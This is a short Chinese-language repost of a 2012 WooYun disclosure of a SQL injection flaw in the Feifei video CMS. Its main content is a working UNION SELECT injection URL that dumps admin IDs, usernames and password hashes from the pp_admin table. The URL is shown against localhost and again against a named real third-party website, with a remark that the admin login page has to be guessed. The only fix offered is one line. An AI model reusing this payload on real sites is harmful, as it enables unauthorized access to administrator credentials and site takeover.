飞飞视频网站注入漏洞[1day 漏洞]

漏洞详情

披露状态:

2012-07-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-07-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入漏洞

详细说明:


http://127.0.0.1/?s=vod-read-id-1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,

concat(0x40,admin_id,0x40,admin_name,0x40,admin_pwd,0x40),28,29%20from%20pp_admin–.html
然后爆出账号密码,后台要自己猜。

修复方案:

对其进行过滤处理

版权声明:转载请注明来源 路人甲@乌云

叫他1day漏洞,因为真的过了1 day…. 路人甲大牛,膜拜一次

http://www.dlbyy.com/?s=vod-read-id-1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

25,26,concat(0x40,admin_id,0x40,admin_name,0x40,admin_pwd,0x40),28,29%20from%20pp_admin--.html

爆出管理用户密码:

“飞飞视频网站注入漏洞[1day 漏洞]”的一个回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注